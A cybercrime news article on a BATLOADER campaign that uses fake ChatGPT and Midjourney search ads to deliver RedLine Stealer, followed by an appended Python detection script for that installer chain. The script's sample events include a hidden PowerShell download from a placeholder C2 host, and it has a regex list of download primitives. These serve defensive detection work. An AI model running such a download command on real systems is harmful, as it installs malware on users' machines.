Caution while searching for AI tools, Rogue websites distributing RedLine malware | Darknet Prime


Malicious Google Search advertisements for generative AI services such as ChatGPT and Midjourney are being used to direct users to dubious websites as part of a BATLOADER campaign designed to deliver RedLine Stealer malware.






cybercrime news. Iris Green, Writer. May 22, 2023 (Updated: July 18, 2023)

Malicious Google Search advertisements are being used in a BATLOADER campaign to direct users to dubious websites offering generative AI services such as OpenAI ChatGPT and Midjourney. These advertisements, flagged by eSentire, exploit the popularity of these AI services, which lack first-party standalone applications. The threat actors drive AI app-seekers to imposter web pages that promote fake apps.

BATLOADER, a loader malware, spreads through drive-by downloads. Users searching for specific keywords on search engines encounter fraudulent ads. Clicking on these ads redirects them to rogue landing pages hosting malware. The installer file contains an executable file and a PowerShell script that downloads and loads RedLine Stealer from a remote server. After installation, the binary uses Microsoft Edge WebView2 to load the legitimate ChatGPT and Midjourney URLs in a pop-up window, avoiding suspicion.

This isn't the first time BATLOADER's operators have exploited the AI trend to distribute malware. In March 2023, eSentire reported similar attacks using ChatGPT lures to deploy Vidar Stealer and Ursnif. The use of Google Search ads for this purpose has decreased since early 2023, indicating that measures have been taken to minimize their exploitation.

These developments are part of a broader wave of phishing and scam campaigns capitalizing on the increasing use of AI tools. Threat actors distribute malware and fake apps through these campaigns. In related research, Sophos identified ChatGPT-related fleeceware apps in the Google Play and Apple App Store, which manipulate users into signing up for unwanted subscriptions.

In recent weeks, both Meta and Palo Alto Networks Unit 42 have warned of rising fraudulent activity that mimics the ChatGPT service. These scams aim to harvest users' credit card details, perpetrate credit card fraud, and create chatbot browser extensions that steal victims' Facebook account information. Unit 42 observed a 910% surge in monthly registrations for domains related to ChatGPT between November 2022 and early April 2023.

These findings follow Securonix's discovery of the OCX#HARVESTER phishing campaign targeting the cryptocurrency sector from December 2022 to March 2023, which used More_eggs, a JavaScript downloader that loads additional payloads. In January, eSentire traced one of the key operators of the malware-as-a-service (MaaS) to an individual in Montreal, Canada. The second threat actor associated with the group has been identified as a Romanian national known as Jack.
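The installer behaviour described above (a fake AI app spawning a PowerShell download of the stealer, then a WebView2 pop-up onto the real ChatGPT or Midjourney site) is a chain a defender can hunt for in process-creation telemetry. The following is an added example, not code from the article or from eSentire; the event records, PIDs, file paths and C2 host are constructed, and the WebView2 host binary name msedgewebview2.exe is assumed.

```python
import re
# Constructed sample of process-creation events (simplified Sysmon Event ID 1 fields),
# modelling the chain the article describes: a fake "AI app" installer spawns a hidden
# PowerShell download of the stealer, then opens the real site in a WebView2 pop-up.
# Paths, PIDs and the C2 host are invented; the C2 host is a labelled placeholder.
SAMPLE_EVENTS = [
    {"pid": 100, "ppid": 1,   "image": r"C:\Windows\explorer.exe", "cmd": "explorer.exe"},
    {"pid": 200, "ppid": 100, "image": r"C:\Users\alice\Downloads\ChatGPT-Setup.exe", "cmd": "ChatGPT-Setup.exe"},
    {"pid": 300, "ppid": 200, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": "powershell.exe -w hidden Invoke-WebRequest http://placeholder-c2.invalid/r.bin -OutFile C:\\ProgramData\\r.exe"},
    {"pid": 400, "ppid": 200, "image": r"C:\Program Files (x86)\Microsoft\EdgeWebView\Application\msedgewebview2.exe",
     "cmd": "msedgewebview2.exe --url=https://chat.openai.com/"},
    # Benign control: an interactive PowerShell session that performs no download.
    {"pid": 500, "ppid": 100, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "cmd": "powershell.exe Get-Process"},
]

# PowerShell download primitives commonly used by loaders (matched case-insensitively).
DOWNLOAD_RE = re.compile(r"invoke-webrequest|\biwr\b|downloadfile|downloadstring|start-bitstransfer|\bcurl\b|\bwget\b", re.I)
# Lure keywords from this campaign, matched against the parent installer's file name.
LURE_RE = re.compile(r"chatgpt|openai|midjourney", re.I)

def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def find_suspicious_chains(events):
    """Return one finding per parent process that (a) spawned PowerShell with a download
    primitive and (b) spawned a WebView2 host, i.e. the installer behaviour in the article."""
    children = {}
    for ev in events:
        children.setdefault(ev["ppid"], []).append(ev)
    findings = []
    for parent in events:
        kids = children.get(parent["pid"], [])
        downloads = [k for k in kids if basename(k["image"]) == "powershell.exe" and DOWNLOAD_RE.search(k["cmd"])]
        webviews = [k for k in kids if basename(k["image"]) == "msedgewebview2.exe"]
        if downloads and webviews:
            findings.append({
                "parent_pid": parent["pid"],
                "parent_image": parent["image"],
                "ai_lure_name": bool(LURE_RE.search(basename(parent["image"]))),
                "download_cmd": downloads[0]["cmd"],
                "webview_cmd": webviews[0]["cmd"],
            })
    return findings

if __name__ == "__main__":
    for f in find_suspicious_chains(SAMPLE_EVENTS):
        print(f"[!] pid {f['parent_pid']} {f['parent_image']} lure-name={f['ai_lure_name']}")
        print(f"    download: {f['download_cmd']}\n    webview : {f['webview_cmd']}")
```

Requiring both children under one parent keeps the benign interactive PowerShell session out of the results; in production the same logic would run over real Sysmon or EDR process events rather than the constructed list.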